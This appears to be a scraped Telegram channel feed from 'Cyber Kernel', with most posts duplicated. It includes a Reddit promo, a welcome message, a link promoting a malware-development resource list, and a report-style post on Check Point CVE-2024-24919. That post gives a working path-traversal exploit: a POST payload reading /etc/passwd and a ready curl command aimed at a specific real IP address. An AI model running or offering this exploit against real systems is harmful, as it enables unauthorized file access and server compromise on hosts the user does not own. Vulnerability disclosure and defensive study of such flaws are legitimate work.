🌟 Exciting Announcement 🌟
Hey everyone! I've just launched a brand new Reddit community dedicated to all things related to cyber security and technology.
Join me on this adventure where we can engage in discussions, share insights, and build a vibrant community together!
🚀 Follow the link below to join us on Reddit and be a part of something special. Let's connect, learn, and inspire each other in this amazing journey! See you there! 🔥
Reddit Community Link: https://www.reddit.com/r/cyberkernelofficial
#NewCommunity #JoinUs #Engagement #RedditFun
Hey everyone! I've just launched a brand new Reddit community dedicated to all things related to cyber security and technology.
Join me on this adventure where we can engage in discussions, share insights, and build a vibrant community together!
🚀 Follow the link below to join us on Reddit and be a part of something special. Let's connect, learn, and inspire each other in this amazing journey! See you there! 🔥
Reddit Community Link: https://www.reddit.com/r/cyberkernelofficial
#NewCommunity #JoinUs #Engagement #RedditFun
Reddit
r/cyberkernelofficial
Welcome to Cyber Kernel, where cybersecurity enthusiasts gather to discuss the latest trends, share insights, and learn from each other's experiences. Join us for engaging conversations, valuable resources, and a supportive community dedicated to enhancing…
New video guys please check it out and if you want any type of content just tell me
🌟 Welcome to Our Telegram Channel! 🌟
Dear @sduifhi486,
We are thrilled to have you join our vibrant Telegram community! 🎉 As a new member, we want to extend a warm welcome and invite you to engage with us. Do you have any questions, queries, or topics you'd like to discuss? Feel free to share your thoughts, and we'll be happy to assist you. Your input and participation are highly valued in our community, and we look forward to your contributions.
Once again, welcome aboard! 🚀
Best regards,
Cyber Kernel
Dear @sduifhi486,
We are thrilled to have you join our vibrant Telegram community! 🎉 As a new member, we want to extend a warm welcome and invite you to engage with us. Do you have any questions, queries, or topics you'd like to discuss? Feel free to share your thoughts, and we'll be happy to assist you. Your input and participation are highly valued in our community, and we look forward to your contributions.
Once again, welcome aboard! 🚀
Best regards,
Cyber Kernel
https://github.com/rootkit-io/awesome-malware-development
Guys, it is a better GitHub repo here you will find a lot of resources to learn malware development I hope you will enjoy it :)
Guys, it is a better GitHub repo here you will find a lot of resources to learn malware development I hope you will enjoy it :)
GitHub
GitHub - rootkit-io/awesome-malware-development: Organized list of my malware development resources
Organized list of my malware development resources - rootkit-io/awesome-malware-development
Check-point CVE-2024-24919 allow unauthorized user to read internal files
Vulnerability Summary:
A critical path traversal vulnerability (CVE-2024-24919) has been identified on the server hosted at example.com. This vulnerability allows an attacker to access sensitive files on the server, including the /etc/passwd file, which can lead to unauthorized access and potential system compromise.
Steps to Reproduce:
To reproduce the vulnerability, follow these steps:
1. Visit the website: https://example.com/
2. Navigate to the path /clients/MyCRL and intercept the request using a third-party proxy tool (e.g., Burp Suite).
3. Send the intercepted request to the repeater.
4. Modify the request method to POST and enter the following payload in request body : aCSHELL/../../../../../../../etc/passwd.
The modified request should look like this:
POST /clients/MyCRL HTTP/1.1
Host: example.com
Content-Length: 39
aCSHELL/../../../../../../../etc/passwd
//also you can do this by simple curl command just change the ip address of host and url:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 212.179.13.8' -H $'Content-Length: 39' -H $'Connection: keep-alive' \
--data-binary $'aCSHELL/../../../../../../../etc/passwd' \
$'https://212.179.13.8/clients/MyCRL'
Impact:
This vulnerability allows attackers to perform directory traversal attacks, accessing sensitive files on the server. Specifically, by accessing the /etc/passwd file, attackers can obtain information about system users, which can be leveraged to further compromise the system. This could lead to:
* Unauthorized access
* Data breaches
* Potential control over the affected server
Poc Attached !
Recommendation:
It is crucial to address this vulnerability immediately to prevent any exploitation. I recommend that the server administrators take the following steps:
1. Patch the vulnerability as soon as possible.
2. Implement additional security measures to prevent directory traversal attacks.
3. Conduct a thorough security audit to identify and remediate any other potential vulnerabilities.
By addressing this vulnerability, you can prevent unauthorized access and potential system compromise, ensuring the security and integrity of your server and data.
Please let us know if you need any further assistance or clarification regarding this vulnerability.
Vulnerability Summary:
A critical path traversal vulnerability (CVE-2024-24919) has been identified on the server hosted at example.com. This vulnerability allows an attacker to access sensitive files on the server, including the /etc/passwd file, which can lead to unauthorized access and potential system compromise.
Steps to Reproduce:
To reproduce the vulnerability, follow these steps:
1. Visit the website: https://example.com/
2. Navigate to the path /clients/MyCRL and intercept the request using a third-party proxy tool (e.g., Burp Suite).
3. Send the intercepted request to the repeater.
4. Modify the request method to POST and enter the following payload in request body : aCSHELL/../../../../../../../etc/passwd.
The modified request should look like this:
POST /clients/MyCRL HTTP/1.1
Host: example.com
Content-Length: 39
aCSHELL/../../../../../../../etc/passwd
//also you can do this by simple curl command just change the ip address of host and url:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 212.179.13.8' -H $'Content-Length: 39' -H $'Connection: keep-alive' \
--data-binary $'aCSHELL/../../../../../../../etc/passwd' \
$'https://212.179.13.8/clients/MyCRL'
Impact:
This vulnerability allows attackers to perform directory traversal attacks, accessing sensitive files on the server. Specifically, by accessing the /etc/passwd file, attackers can obtain information about system users, which can be leveraged to further compromise the system. This could lead to:
* Unauthorized access
* Data breaches
* Potential control over the affected server
Poc Attached !
Recommendation:
It is crucial to address this vulnerability immediately to prevent any exploitation. I recommend that the server administrators take the following steps:
1. Patch the vulnerability as soon as possible.
2. Implement additional security measures to prevent directory traversal attacks.
3. Conduct a thorough security audit to identify and remediate any other potential vulnerabilities.
By addressing this vulnerability, you can prevent unauthorized access and potential system compromise, ensuring the security and integrity of your server and data.
Please let us know if you need any further assistance or clarification regarding this vulnerability.